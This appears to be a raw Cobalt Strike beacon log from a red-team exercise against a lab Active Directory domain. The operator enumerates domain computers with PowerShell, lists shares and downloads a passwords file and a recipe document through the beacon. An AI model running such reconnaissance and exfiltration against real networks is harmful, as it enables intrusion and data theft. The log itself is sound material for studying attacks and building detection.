l-win2197 unknown + l-win2198 unknown + l-win2199 unknown + l-win2200 unknown + l-win2201 unknown + l-win2202 unknown + l-win2203 unknown + l-win2204 unknown + l-win2205 unknown + l-win2206 unknown + l-win2207 unknown + l-win2208 unknown + l-win2209 unknown + l-win2210 unknown + l-win2211 unknown + l-win2212 unknown + l-win2213 unknown + l-win2214 unknown + l-win2215 unknown + l-win2216 unknown + l-win2217 unknown + l-win2218 unknown + l-win2219 unknown + l-win2220 unknown + l-win2221 unknown + l-win2222 unknown + l-win2223 unknown + l-win2224 unknown + l-win2225 unknown + l-win2226 unknown + l-win2227 unknown + l-win2228 unknown + l-win2229 unknown + l-win2230 unknown + l-win2231 unknown + l-win2232 unknown + l-win2233 unknown + l-win2234 unknown + l-win2235 unknown + l-win2236 unknown + l-win2237 unknown + l-win2238 unknown + l-win2239 unknown + 
l-win2240 unknown + l-win2241 unknown + l-win2242 unknown + l-win2243 unknown + l-win2244 unknown + l-win2245 unknown + l-win2246 unknown + l-win2247 unknown + l-win2248 unknown + l-win2249 unknown + l-win2250 unknown + l-win2251 unknown + l-win2252 unknown + l-win2253 unknown + l-win2254 unknown + l-win2255 unknown + l-win2256 unknown + l-win2257 unknown + l-win2258 unknown + l-win2259 unknown + l-win2260 unknown + l-win2261 unknown + l-win2262 unknown + l-win2263 unknown + l-win2264 unknown + l-win2265 unknown + l-win2266 unknown + l-win2267 unknown + l-win2268 unknown + l-win2269 unknown + l-win2270 unknown + l-win2271 unknown + l-win2272 unknown + l-win2273 unknown + l-win2274 unknown + l-win2275 unknown + l-win2276 unknown + l-win2277 unknown + l-win2278 unknown + l-win2279 unknown + l-win2280 unknown + s-lin100 unknown + s-lin101 unknown + s-lin102 unknown + s-lin103 unknown + s-lin104 unknown + s-lin105 unknown + s-lin106 unknown + s-lin107 unknown + s-lin108 unknown + s-lin109 unknown + s-lin110 unknown + s-lin111 unknown + s-lin112 unknown + s-lin113 unknown + s-lin114 unknown + s-lin115 unknown + s-lin116 unknown + s-lin117 unknown + s-lin118 unknown + s-lin119 unknown + s-lin120 unknown + s-lin121 unknown + s-lin122 unknown + s-lin123 unknown + s-lin124 unknown + s-lin125 unknown + s-lin126 unknown + s-lin127 unknown + s-lin128 unknown + s-lin129 unknown + s-lin130 unknown + s-lin131 unknown + s-lin132 unknown + s-lin133 unknown + s-lin134 unknown + s-lin135 unknown + s-lin136 unknown + s-lin137 unknown + s-lin138 unknown + s-lin139 unknown + s-lin140 unknown + s-lin141 unknown + s-lin142 unknown + s-lin143 unknown + s-lin144 unknown + s-lin145 unknown + s-lin146 unknown + s-lin147 unknown + s-lin148 unknown + s-lin149 unknown + s-lin150 unknown + s-lin151 unknown + s-lin152 unknown + s-lin153 unknown + s-lin154 unknown + s-lin155 unknown + s-lin156 unknown + s-lin157 unknown + s-lin158 unknown + s-lin159 unknown + s-lin160 unknown + s-lin161 unknown + 
s-lin162 unknown + s-lin163 unknown + s-lin164 unknown + s-lin165 unknown + s-lin166 unknown + s-lin167 unknown + s-lin168 unknown + s-lin169 unknown + s-lin170 unknown + s-lin171 unknown + s-lin172 unknown + s-lin173 unknown + s-lin174 unknown + s-lin175 unknown + s-lin176 unknown + s-lin177 unknown + s-lin178 unknown + s-lin179 unknown + s-lin180 unknown + s-lin181 unknown + s-lin182 unknown + s-lin183 unknown + s-lin184 unknown + s-lin185 unknown + s-lin186 unknown + s-lin187 unknown + s-lin188 unknown + s-lin189 unknown + s-lin190 unknown + s-lin191 unknown + s-lin192 unknown + s-lin193 unknown + s-lin194 unknown + s-lin195 unknown + s-lin196 unknown + s-lin197 unknown + s-lin198 unknown + s-lin199 unknown + s-lin200 unknown + s-lin201 unknown + s-lin202 unknown + s-lin203 unknown + s-lin204 unknown + s-lin205 unknown + s-lin206 unknown + s-lin207 unknown + s-lin208 unknown + s-lin209 unknown + s-lin210 unknown + s-lin211 unknown + s-lin212 unknown + s-lin213 unknown + s-lin214 unknown + s-lin215 unknown + s-lin216 unknown + s-lin217 unknown + s-lin218 unknown + s-lin219 unknown + s-lin220 unknown + s-lin221 unknown + s-lin222 unknown + s-lin223 unknown + s-lin224 unknown + s-lin225 unknown + s-lin226 unknown + s-lin227 unknown + s-lin228 unknown + s-lin229 unknown + s-lin230 unknown + s-lin231 unknown + s-lin232 unknown + s-lin233 unknown + s-lin234 unknown + s-lin235 unknown + s-lin236 unknown + s-lin237 unknown + s-lin238 unknown + s-lin239 unknown + s-lin240 unknown + s-lin241 unknown + s-lin242 unknown + s-lin243 unknown + s-lin244 unknown + s-lin245 unknown + s-lin246 unknown + s-lin247 unknown + s-lin248 unknown + s-lin249 unknown + s-lin250 unknown + s-lin251 unknown + s-lin252 unknown + s-lin253 unknown + s-lin254 unknown + s-lin255 unknown + s-lin256 unknown + s-lin257 unknown + s-lin258 unknown + s-lin259 unknown + s-lin260 unknown + s-lin261 unknown + s-lin262 unknown + s-lin263 unknown + s-lin264 unknown + s-lin265 unknown + s-lin266 unknown + 
s-lin267 unknown + s-lin268 unknown + s-lin269 unknown + s-lin270 unknown + s-lin271 unknown + s-lin272 unknown + s-lin273 unknown + s-lin274 unknown + s-lin275 unknown + s-lin276 unknown + s-lin277 unknown + s-lin278 unknown + s-lin279 unknown + s-lin280 unknown + s-lin281 unknown + s-lin282 unknown + s-lin283 unknown + s-lin284 unknown + s-lin285 unknown + s-lin286 unknown + s-lin287 unknown + s-lin288 unknown + s-lin289 unknown + s-lin290 unknown + s-lin291 unknown + s-lin292 unknown + s-lin293 unknown + s-lin294 unknown + s-lin295 unknown + s-lin296 unknown + s-lin297 unknown + s-lin298 unknown + s-lin299 unknown + s-lin300 unknown + pcd-100 unknown + pcd-101 unknown + pcd-102 unknown + pcd-103 unknown + pcd-104 unknown + pcd-105 unknown + pcd-106 unknown + pcd-107 unknown + pcd-108 unknown + pcd-109 unknown + pcd-110 unknown + pcd-111 unknown + pcd-112 unknown + pcd-113 unknown + pcd-114 unknown + pcd-115 unknown + pcd-116 unknown + pcd-117 unknown + pcd-118 unknown + pcd-119 unknown + pcd-120 unknown + pcd-121 unknown + S-WIN43 10.1.2.13 + S-WIN44 10.1.2.14 + L-WIN223 10.1.3.10 + L-WIN224 10.1.3.11 + L-WIN225 10.1.3.12 + L-WIN226 10.1.3.13 + L-WIN227 10.1.4.10 + L-WIN228 10.1.4.11 + S-WIN45 10.2.1.20 + + +03/30 08:48:32 UTC [input] powreshell get-domaincomputer +03/30 08:48:32 UTC [error] Unknown command: powreshell get-domaincomputer +03/30 08:48:37 UTC [input] powershell get-domaincomputer +03/30 08:48:37 UTC [task] Tasked beacon to run: get-domaincomputer +03/30 08:48:38 UTC [checkin] host called home, sent: 321 bytes +03/30 08:48:40 UTC [output] +received output: +#< CLIXML +System.Management.Automation.PSCustomObjectSystem.Object1Preparing modules for first use.0-1-1Completed-1 1Preparing modules for first use.0-1-1Completed-1 get-domaincomputer : The term 'get-domaincomputer' is not recognized as the name of a cmdlet, function, script file, _x000D__x000A_or operable program. 
Check the spelling of the name, or if a path was included, verify that the path is correct and _x000D__x000A_try again._x000D__x000A_At line:1 char:75_x000D__x000A_+ ... client).DownloadString('http://127.0.0.1:26388/'); get-domaincomputer_x000D__x000A_+ ~~~~~~~~~~~~~~~~~~_x000D__x000A_ + CategoryInfo : ObjectNotFound: (get-domaincomputer:String) [], CommandNotFoundException_x000D__x000A_ + FullyQualifiedErrorId : CommandNotFoundException_x000D__x000A_ _x000D__x000A_ + +03/30 08:49:26 UTC [input] powershell get-netcomputer +03/30 08:49:26 UTC [task] Tasked beacon to run: get-netcomputer +03/30 08:49:27 UTC [checkin] host called home, sent: 313 bytes +03/30 08:49:29 UTC [output] +received output: +#< CLIXML +S-WIN22.stroop.local +S-WIN21.stroop.local +S-WIN43.stroop.local +S-WIN44.stroop.local +L-WIN223.stroop.local +L-WIN224.stroop.local +L-WIN225.stroop.local +L-WIN226.stroop.local +L-WIN227.stroop.local +L-WIN228.stroop.local +S-WIN45.stroop.local +System.Management.Automation.PSCustomObjectSystem.Object1Preparing modules for first use.0-1-1Completed-1 + +03/30 08:49:38 UTC [input] powershell get-netcomputer -fulldata +03/30 08:49:38 UTC [task] Tasked beacon to run: get-netcomputer -fulldata +03/30 08:49:38 UTC [checkin] host called home, sent: 337 bytes +03/30 08:49:40 UTC [output] +received output: +#< CLIXML + + +logoncount : 14 +msds-generationid : {116, 93, 120, 30...} +serverreferencebl : CN=S-WIN22,CN=Servers,CN=FactoryNL,CN=Sites,CN=Configuration,DC=stroop,DC=local +iscriticalsystemobject : True +distinguishedname : CN=S-WIN22,OU=Domain Controllers,DC=stroop,DC=local +objectclass : {top, person, organizationalPerson, user...} +lastlogontimestamp : 3/29/2020 10:39:08 AM +name : S-WIN22 +objectsid : S-1-5-21-2163199188-2306780613-1636707950-4887 +samaccountname : S-WIN22$ +localpolicyflags : 0 +codepage : 0 +samaccounttype : 805306369 +whenchanged : 3/29/2020 10:45:35 AM +countrycode : 0 +cn : S-WIN22 +accountexpires : 9223372036854775807 +adspath : 
LDAP://CN=S-WIN22,OU=Domain Controllers,DC=stroop,DC=local +instancetype : 4 +msdfsr-computerreferencebl : CN=S-WIN22,CN=Topology,CN=Domain System + Volume,CN=DFSR-GlobalSettings,CN=System,DC=stroop,DC=local +objectguid : 739b8d8a-66db-4d1f-accb-3b54c02be81f +operatingsystem : Windows Server 2012 R2 Datacenter +operatingsystemversion : 6.3 (9600) +objectcategory : CN=Computer,CN=Schema,CN=Configuration,DC=stroop,DC=local +dscorepropagationdata : 1/1/1601 12:00:00 AM +serviceprincipalname : {DNS/S-WIN22.stroop.local, HOST/S-WIN22.stroop.local/STROOP, + RPC/74e70e8d-7d61-4bdc-a817-63fa62eb73b2._msdcs.stroop.local, + GC/S-WIN22.stroop.local/stroop.local...} +usncreated : 8042 +lastlogon : 3/30/2020 7:51:46 AM +useraccountcontrol : 532480 +whencreated : 3/29/2020 10:39:08 AM +primarygroupid : 516 +pwdlastset : 3/29/2020 10:39:08 AM +msds-supportedencryptiontypes : 28 +usnchanged : 28707 +ridsetreferences : CN=RID Set,CN=S-WIN22,OU=Domain Controllers,DC=stroop,DC=local +dnshostname : S-WIN22.stroop.local + +serverreferencebl : CN=S-WIN21,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=stroop,DC + =local +iscriticalsystemobject : True +distinguishedname : CN=S-WIN21,OU=Domain Controllers,DC=stroop,DC=local +objectclass : {top, person, organizationalPerson, user...} +lastlogontimestamp : 3/29/2020 9:54:48 AM +name : S-WIN21 +objectsid : S-1-5-21-2163199188-2306780613-1636707950-1001 +samaccountname : S-WIN21$ +localpolicyflags : 0 +codepage : 0 +samaccounttype : 805306369 +whenchanged : 3/29/2020 10:39:20 AM +countrycode : 0 +cn : S-WIN21 +accountexpires : 9223372036854775807 +adspath : LDAP://CN=S-WIN21,OU=Domain Controllers,DC=stroop,DC=local +instancetype : 4 +msdfsr-computerreferencebl : CN=S-WIN21,CN=Topology,CN=Domain System + Volume,CN=DFSR-GlobalSettings,CN=System,DC=stroop,DC=local +objectguid : 2f094ab8-be92-40b1-aa06-63512f213122 +operatingsystem : Windows Server 2012 R2 Datacenter +operatingsystemversion : 6.3 (9600) +objectcategory : 
CN=Computer,CN=Schema,CN=Configuration,DC=stroop,DC=local +dscorepropagationdata : 1/1/1601 12:00:00 AM +serviceprincipalname : {Dfsr-12F9A27C-BF97-4787-9364-D31B6C55EB04/S-WIN21.stroop.local, + ldap/S-WIN21.stroop.local/ForestDnsZones.stroop.local, + ldap/S-WIN21.stroop.local/DomainDnsZones.stroop.local, TERMSRV/S-WIN21...} +usncreated : 8029 +useraccountcontrol : 532480 +whencreated : 3/29/2020 9:54:08 AM +primarygroupid : 516 +pwdlastset : 3/29/2020 9:54:24 AM +msds-supportedencryptiontypes : 28 +usnchanged : 8029 +ridsetreferences : CN=RID Set,CN=S-WIN21,OU=Domain Controllers,DC=stroop,DC=local +dnshostname : S-WIN21.stroop.local + +iscriticalsystemobject : False +distinguishedname : CN=S-WIN43,OU=Servers,OU=Office,OU=Systems,DC=stroop,DC=local +objectclass : {top, person, organizationalPerson, user...} +lastlogontimestamp : 3/29/2020 10:12:41 AM +name : S-WIN43 +objectsid : S-1-5-21-2163199188-2306780613-1636707950-4879 +samaccountname : S-WIN43$ +localpolicyflags : 0 +codepage : 0 +samaccounttype : 805306369 +whenchanged : 3/29/2020 10:39:40 AM +countrycode : 0 +cn : S-WIN43 +accountexpires : 9223372036854775807 +adspath : LDAP://CN=S-WIN43,OU=Servers,OU=Office,OU=Systems,DC=stroop,DC=local +instancetype : 4 +usncreated : 20814 +objectguid : 20a22808-5fb5-4f65-b2cf-591028941467 +operatingsystem : Windows Server 2012 R2 Datacenter +operatingsystemversion : 6.3 (9600) +objectcategory : CN=Computer,CN=Schema,CN=Configuration,DC=stroop,DC=local +dscorepropagationdata : 1/1/1601 12:00:00 AM +serviceprincipalname : {TERMSRV/S-WIN43, TERMSRV/S-WIN43.stroop.local, WSMAN/S-WIN43, + WSMAN/S-WIN43.stroop.local...} +useraccountcontrol : 4096 +whencreated : 3/29/2020 10:12:40 AM +primarygroupid : 515 +pwdlastset : 3/29/2020 10:12:40 AM +msds-supportedencryptiontypes : 28 +usnchanged : 20814 +dnshostname : S-WIN43.stroop.local + +iscriticalsystemobject : False +distinguishedname : CN=S-WIN44,OU=Servers,OU=Office,OU=Systems,DC=stroop,DC=local +objectclass : {top, person, 
organizationalPerson, user...}
+lastlogontimestamp : 3/29/2020 10:15:40 AM
+name : S-WIN44
+objectsid : S-1-5-21-2163199188-2306780613-1636707950-4880
+samaccountname : S-WIN44$
+localpolicyflags : 0
+codepage : 0
+samaccounttype : 805306369
+whenchanged : 3/29/2020 10:39:40 AM
+countrycode : 0
+cn : S-WIN44
+accountexpires : 9223372036854775807
+adspath : LDAP://CN=S-WIN44,OU=Servers,OU=Office,OU=Systems,DC=stroop,DC=local
+instancetype : 4
+usncreated : 20816
+objectguid : 66124476-67bb-42c7-984e-49207ad97de4
+operatingsystem : Windows Server 2016 Datacenter
+operatingsystemversion : 10.0 (14393)
+objectcategory : CN=Computer,CN=Schema,CN=Configuration,DC=stroop,DC=local
+dscorepropagationdata : 1/1/1601 12:00:00 AM
+serviceprincipalname : {WSMAN/S-WIN44, WSMAN/S-WIN44.stroop.local, TERMSRV/S-WIN44,
+ TERMSRV/S-WIN44.stroop.local...}
+memberof : CN=Event Log Readers,CN=Builtin,DC=stroop,DC=local
+useraccountcontrol : 4096
+whencreated : 3/29/2020 10:15:40 AM
+primarygroupid : 515
+pwdlastset : 3/29/2020 10:15:40 AM
+msds-supportedencryptiontypes : 28
+usnchanged : 20816
+dnshostname : S-WIN44.stroop.local
+
+logoncount : 11
+iscriticalsystemobject : False
+distinguishedname : CN=L-WIN223,OU=EUC,OU=Office,OU=Systems,DC=stroop,DC=local
+objectclass : {top, person, organizationalPerson, user...}
+lastlogontimestamp : 3/29/2020 10:18:00 AM
+objectsid : S-1-5-21-2163199188-2306780613-1636707950-4881
+samaccountname : L-WIN223$
+localpolicyflags : 0
+codepage : 0
+samaccounttype : 805306369
+whenchanged : 3/29/2020 10:39:40 AM
+countrycode : 0
+cn : L-WIN223
+accountexpires : 9223372036854775807
+adspath : LDAP://CN=L-WIN223,OU=EUC,OU=Office,OU=Systems,DC=stroop,DC=local
+instancetype : 4
+usncreated : 20818
+objectguid : 1878f205-7905-4b97-814e-990c3d8a9909
+operatingsystem : Windows 10 Enterprise LTSC
+operatingsystemversion : 10.0 (17763)
+objectcategory : CN=Computer,CN=Schema,CN=Configuration,DC=stroop,DC=local
+dscorepropagationdata : 1/1/1601 12:00:00 AM
+serviceprincipalname : {WSMAN/L-WIN223, WSMAN/L-WIN223.stroop.local, TERMSRV/L-WIN223,
+ TERMSRV/L-WIN223.stroop.local...}
+lastlogon : 3/30/2020 8:40:35 AM
+usnchanged : 20818
+useraccountcontrol : 4096
+whencreated : 3/29/2020 10:18:00 AM
+primarygroupid : 515
+pwdlastset : 3/29/2020 10:18:00 AM
+msds-supportedencryptiontypes : 28
+name : L-WIN223
+dnshostname : L-WIN223.stroop.local
+
+logoncount : 5
+iscriticalsystemobject : False
+description : Workstation of w.trommel
+distinguishedname : CN=L-WIN224,OU=EUC,OU=Office,OU=Systems,DC=stroop,DC=local
+objectclass : {top, person, organizationalPerson, user...}
+lastlogontimestamp : 3/29/2020 10:20:19 AM
+name : L-WIN224
+objectsid : S-1-5-21-2163199188-2306780613-1636707950-4882
+samaccountname : L-WIN224$
+localpolicyflags : 0
+codepage : 0
+samaccounttype : 805306369
+whenchanged : 3/29/2020 11:30:05 AM
+countrycode : 0
+cn : L-WIN224
+accountexpires : 9223372036854775807
+adspath : LDAP://CN=L-WIN224,OU=EUC,OU=Office,OU=Systems,DC=stroop,DC=local
+instancetype : 4
+usncreated : 20820
+objectguid : 4413516a-6c9d-4c02-897c-dfa11d70ebf6
+operatingsystem : Windows 10 Enterprise LTSC
+operatingsystemversion : 10.0 (17763)
+objectcategory : CN=Computer,CN=Schema,CN=Configuration,DC=stroop,DC=local
+dscorepropagationdata : 1/1/1601 12:00:00 AM
+serviceprincipalname : {WSMAN/L-WIN224, WSMAN/L-WIN224.stroop.local, TERMSRV/L-WIN224,
+ TERMSRV/L-WIN224.stroop.local...}
+lastlogon : 3/30/2020 8:36:46 AM
+useraccountcontrol : 4096
+whencreated : 3/29/2020 10:20:19 AM
+primarygroupid : 515
+pwdlastset : 3/29/2020 10:20:19 AM
+msds-supportedencryptiontypes : 28
+usnchanged : 30980
+dnshostname : L-WIN224.stroop.local
+
+logoncount : 1
+iscriticalsystemobject : False
+distinguishedname : CN=L-WIN225,OU=EUC,OU=Office,OU=Systems,DC=stroop,DC=local
+objectclass : {top, person, organizationalPerson, user...}
+lastlogontimestamp : 3/29/2020 10:22:39 AM
+objectsid : S-1-5-21-2163199188-2306780613-1636707950-4883
+samaccountname : 
L-WIN225$
+localpolicyflags : 0
+codepage : 0
+samaccounttype : 805306369
+whenchanged : 3/29/2020 10:39:40 AM
+countrycode : 0
+cn : L-WIN225
+accountexpires : 9223372036854775807
+adspath : LDAP://CN=L-WIN225,OU=EUC,OU=Office,OU=Systems,DC=stroop,DC=local
+instancetype : 4
+usncreated : 20822
+objectguid : 7dec6123-03bf-42f9-b65a-5afdcdddb997
+operatingsystem : Windows 10 Enterprise LTSC
+operatingsystemversion : 10.0 (17763)
+objectcategory : CN=Computer,CN=Schema,CN=Configuration,DC=stroop,DC=local
+dscorepropagationdata : 1/1/1601 12:00:00 AM
+serviceprincipalname : {WSMAN/L-WIN225, WSMAN/L-WIN225.stroop.local, TERMSRV/L-WIN225,
+ TERMSRV/L-WIN225.stroop.local...}
+lastlogon : 3/30/2020 8:43:44 AM
+usnchanged : 20822
+useraccountcontrol : 4096
+whencreated : 3/29/2020 10:22:39 AM
+primarygroupid : 515
+pwdlastset : 3/29/2020 10:22:39 AM
+msds-supportedencryptiontypes : 28
+name : L-WIN225
+dnshostname : L-WIN225.stroop.local
+
+iscriticalsystemobject : False
+distinguishedname : CN=L-WIN226,OU=EUC,OU=Office,OU=Systems,DC=stroop,DC=local
+objectclass : {top, person, organizationalPerson, user...}
+lastlogontimestamp : 3/29/2020 10:24:59 AM
+name : L-WIN226
+objectsid : S-1-5-21-2163199188-2306780613-1636707950-4884
+samaccountname : L-WIN226$
+localpolicyflags : 0
+codepage : 0
+samaccounttype : 805306369
+whenchanged : 3/29/2020 10:39:40 AM
+countrycode : 0
+cn : L-WIN226
+accountexpires : 9223372036854775807
+adspath : LDAP://CN=L-WIN226,OU=EUC,OU=Office,OU=Systems,DC=stroop,DC=local
+instancetype : 4
+usncreated : 20824
+objectguid : 34bdae43-1ba1-45ee-a3cf-ab25e6f9cd30
+operatingsystem : Windows 10 Enterprise LTSC
+operatingsystemversion : 10.0 (17763)
+objectcategory : CN=Computer,CN=Schema,CN=Configuration,DC=stroop,DC=local
+dscorepropagationdata : 1/1/1601 12:00:00 AM
+serviceprincipalname : {WSMAN/L-WIN226, WSMAN/L-WIN226.stroop.local, TERMSRV/L-WIN226,
+ TERMSRV/L-WIN226.stroop.local...}
+useraccountcontrol : 4096
+whencreated : 3/29/2020 10:24:59 AM
+primarygroupid : 515
+pwdlastset : 3/29/2020 10:24:59 AM
+msds-supportedencryptiontypes : 28
+usnchanged : 20824
+dnshostname : L-WIN226.stroop.local
+
+logoncount : 8
+iscriticalsystemobject : False
+description : ADMIN workstation of ADMIN-w.trommel
+distinguishedname : CN=L-WIN227,OU=EUC,OU=Office,OU=Systems,DC=stroop,DC=local
+objectclass : {top, person, organizationalPerson, user...}
+lastlogontimestamp : 3/29/2020 10:27:16 AM
+name : L-WIN227
+objectsid : S-1-5-21-2163199188-2306780613-1636707950-4885
+samaccountname : L-WIN227$
+localpolicyflags : 0
+codepage : 0
+samaccounttype : 805306369
+whenchanged : 3/29/2020 11:30:05 AM
+countrycode : 0
+cn : L-WIN227
+accountexpires : 9223372036854775807
+adspath : LDAP://CN=L-WIN227,OU=EUC,OU=Office,OU=Systems,DC=stroop,DC=local
+instancetype : 4
+usncreated : 20826
+objectguid : 6199a74b-c55c-4b13-8c10-9adc295d646a
+operatingsystem : Windows 10 Enterprise LTSC
+operatingsystemversion : 10.0 (17763)
+objectcategory : CN=Computer,CN=Schema,CN=Configuration,DC=stroop,DC=local
+dscorepropagationdata : 1/1/1601 12:00:00 AM
+serviceprincipalname : {WSMAN/L-WIN227, WSMAN/L-WIN227.stroop.local, TERMSRV/L-WIN227,
+ TERMSRV/L-WIN227.stroop.local...}
+lastlogon : 3/30/2020 7:46:16 AM
+useraccountcontrol : 4096
+whencreated : 3/29/2020 10:27:16 AM
+primarygroupid : 515
+pwdlastset : 3/29/2020 10:27:16 AM
+msds-supportedencryptiontypes : 28
+usnchanged : 30968
+dnshostname : L-WIN227.stroop.local
+
+logoncount : 3
+iscriticalsystemobject : False
+description : ADMIN workstation of ADMIN-a.kool
+distinguishedname : CN=L-WIN228,OU=EUC,OU=Office,OU=Systems,DC=stroop,DC=local
+objectclass : {top, person, organizationalPerson, user...}
+lastlogontimestamp : 3/29/2020 10:29:36 AM
+name : L-WIN228
+objectsid : S-1-5-21-2163199188-2306780613-1636707950-4886
+samaccountname : L-WIN228$
+localpolicyflags : 0
+codepage : 0
+samaccounttype : 805306369
+whenchanged : 3/29/2020 11:30:05 AM
+countrycode : 0
+cn : L-WIN228
+accountexpires : 
9223372036854775807
+adspath : LDAP://CN=L-WIN228,OU=EUC,OU=Office,OU=Systems,DC=stroop,DC=local
+instancetype : 4
+usncreated : 20828
+objectguid : e960b9ef-6f1e-40dd-82fd-129e0ad7b5a2
+operatingsystem : Windows 10 Enterprise LTSC
+operatingsystemversion : 10.0 (17763)
+objectcategory : CN=Computer,CN=Schema,CN=Configuration,DC=stroop,DC=local
+dscorepropagationdata : 1/1/1601 12:00:00 AM
+serviceprincipalname : {WSMAN/L-WIN228, WSMAN/L-WIN228.stroop.local, TERMSRV/L-WIN228,
+ TERMSRV/L-WIN228.stroop.local...}
+lastlogon : 3/30/2020 8:11:41 AM
+useraccountcontrol : 4096
+whencreated : 3/29/2020 10:29:35 AM
+primarygroupid : 515
+pwdlastset : 3/29/2020 10:29:35 AM
+msds-supportedencryptiontypes : 28
+usnchanged : 30979
+dnshostname : L-WIN228.stroop.local
+
+logoncount : 16
+badpasswordtime : 1/1/1601 12:00:00 AM
+description : Steppingstone to s-lin99 (Main factory and recipe controller)
+distinguishedname : CN=S-WIN45,OU=Factory,OU=Systems,DC=stroop,DC=local
+objectclass : {top, person, organizationalPerson, user...}
+lastlogontimestamp : 3/29/2020 10:50:59 AM
+name : S-WIN45
+objectsid : S-1-5-21-2163199188-2306780613-1636707950-5602
+samaccountname : S-WIN45$
+localpolicyflags : 0
+lastlogon : 3/30/2020 8:33:47 AM
+codepage : 0
+samaccounttype : 805306369
+whenchanged : 3/29/2020 11:30:05 AM
+accountexpires : 9223372036854775807
+countrycode : 0
+adspath : LDAP://CN=S-WIN45,OU=Factory,OU=Systems,DC=stroop,DC=local
+instancetype : 4
+operatingsystem : Windows Server 2012 R2 Datacenter
+objectguid : b358eff4-301e-4bed-a9cf-00c12602e854
+operatingsystemversion : 6.3 (9600)
+lastlogoff : 1/1/1601 12:00:00 AM
+objectcategory : CN=Computer,CN=Schema,CN=Configuration,DC=stroop,DC=local
+dscorepropagationdata : 1/1/1601 12:00:00 AM
+serviceprincipalname : {TERMSRV/S-WIN45, TERMSRV/S-WIN45.stroop.local, WSMAN/S-WIN45,
+ WSMAN/S-WIN45.stroop.local...}
+whencreated : 3/29/2020 10:50:58 AM
+iscriticalsystemobject : False
+badpwdcount : 0
+cn : S-WIN45
+useraccountcontrol : 
4096
+usncreated : 28793
+primarygroupid : 515
+pwdlastset : 3/29/2020 10:50:58 AM
+msds-supportedencryptiontypes : 28
+usnchanged : 30969
+dnshostname : S-WIN45.stroop.local
+
+
+
+System.Management.Automation.PSCustomObjectSystem.Object1Preparing modules for first use.0-1-1Completed-1
+
+03/30 09:22:04 UTC [input] sleep 60
+03/30 09:22:04 UTC [task] Tasked beacon to sleep for 60s
+03/30 09:22:05 UTC [checkin] host called home, sent: 16 bytes
+03/30 09:23:14 UTC [input] sleep 5
+03/30 09:23:14 UTC [task] Tasked beacon to sleep for 5s
+03/30 09:24:06 UTC [checkin] host called home, sent: 16 bytes
+03/30 09:29:44 UTC [input] shell net use
+03/30 09:29:44 UTC [task] Tasked beacon to run: net use
+03/30 09:29:48 UTC [checkin] host called home, sent: 38 bytes
+03/30 09:29:48 UTC [output]
+received output:
+New connections will be remembered.
+
+
+Status Local Remote Network
+
+-------------------------------------------------------------------------------
+OK H: \\S-win43\UserHome$\W.Tax Microsoft Windows Network
+The command completed successfully.
+
+
+
+03/30 09:29:56 UTC [input] dir \\s-win43\
+03/30 09:29:56 UTC [error] Unknown command: dir \\s-win43\
+03/30 09:29:59 UTC [input] shell dir \\s-win43\
+03/30 09:29:59 UTC [task] Tasked beacon to run: dir \\s-win43\
+03/30 09:30:03 UTC [checkin] host called home, sent: 45 bytes
+03/30 09:30:03 UTC [output]
+received output:
+The specified path is invalid.
+
+
+03/30 09:30:13 UTC [input] shell dir \\s-win43.stroop.local\
+03/30 09:30:13 UTC [task] Tasked beacon to run: dir \\s-win43.stroop.local\
+03/30 09:30:13 UTC [checkin] host called home, sent: 58 bytes
+03/30 09:30:13 UTC [output]
+received output:
+The specified path is invalid.
+
+
+03/30 09:30:33 UTC [checkin] host called home, sent: 31 bytes
+03/30 09:30:44 UTC [checkin] host called home, sent: 20 bytes
+03/30 09:30:50 UTC [input] download H:\RecipeTeammeeting_Apr1_newrecipes.pptx
+03/30 09:30:50 UTC [task] Tasked beacon to download H:\RecipeTeammeeting_Apr1_newrecipes.pptx
+03/30 09:30:54 UTC [checkin] host called home, sent: 49 bytes
+03/30 09:30:54 UTC [output]
+started download of H:\RecipeTeammeeting_Apr1_newrecipes.pptx (1056424 bytes)
+
+03/30 09:30:57 UTC [input] download H:\passwords.txt.txt
+03/30 09:30:57 UTC [task] Tasked beacon to download H:\passwords.txt.txt
+03/30 09:30:59 UTC [checkin] host called home, sent: 28 bytes
+03/30 09:30:59 UTC [output]
+started download of H:\passwords.txt.txt (114 bytes)
+
+03/30 09:30:59 UTC [output]
+download of passwords.txt.txt is complete
+
+03/30 09:31:04 UTC [output]
+download of RecipeTeammeeting_Apr1_newrecipes.pptx is complete
+
+03/30 09:31:09 UTC [checkin] host called home, sent: 27 bytes
+03/30 09:31:09 UTC [error] could not open \\s-win43\*: 67
+03/30 09:33:25 UTC [input] shell net view \\s-win43
+03/30 09:33:25 UTC [task] Tasked beacon to run: net view \\s-win43
+03/30 09:33:25 UTC [checkin] host called home, sent: 49 bytes
+03/30 09:33:25 UTC [output]
+received output:
+Shared resources at \\s-win43
+
+
+
+Share name Type Used as Comment
+
+-------------------------------------------------------------------------------
+DepartmentShares Disk
+Software Disk
+The command completed successfully.
+
+
+
+03/30 09:33:41 UTC [input] shell dir \\s-win43\DepartmentShares
+03/30 09:33:41 UTC [task] Tasked beacon to run: dir \\s-win43\DepartmentShares
+03/30 09:33:46 UTC [checkin] host called home, sent: 61 bytes
+03/30 09:33:46 UTC [output]
+received output:
+ Volume in drive \\s-win43\DepartmentShares is Windows
+ Volume Serial Number is BA06-AED5
+
+ Directory of \\s-win43\DepartmentShares
+
+03/29/2020 10:53 AM .
+03/29/2020 10:53 AM ..
+03/29/2020 10:53 AM FinanceDept
+03/29/2020 10:53 AM HRDept
+03/29/2020 10:53 AM ITDept
+03/29/2020 10:53 AM LogisticsDept
+03/29/2020 10:53 AM MngtBoard
+03/29/2020 10:53 AM RiskDept
+03/29/2020 11:03 AM Software
+ 0 File(s) 0 bytes
+ 9 Dir(s) 106,498,801,664 bytes free
+
+
+03/30 09:33:55 UTC [input] shell dir \\s-win43\Software
+03/30 09:33:55 UTC [task] Tasked beacon to run: dir \\s-win43\Software
+03/30 09:33:56 UTC [checkin] host called home, sent: 53 bytes
+03/30 09:33:56 UTC [output]
+received output:
+ Volume in drive \\s-win43\Software is Windows
+ Volume Serial Number is BA06-AED5
+
+ Directory of \\s-win43\Software
+
+03/29/2020 11:03 AM .
+03/29/2020 11:03 AM ..
+03/29/2020 11:03 AM 1,735,168 7zx64.msi
+03/29/2020 11:03 AM 4,228,352 BgInfo64.exe
+03/29/2020 11:03 AM 60,940,800 chromex64.msi
+03/29/2020 11:03 AM 21,368,251 GRR_3.2.2.0_amd64.exe
+03/29/2020 11:03 AM 4,336 netcease.ps1
+03/29/2020 11:03 AM 9,981,952 nppx64.msi
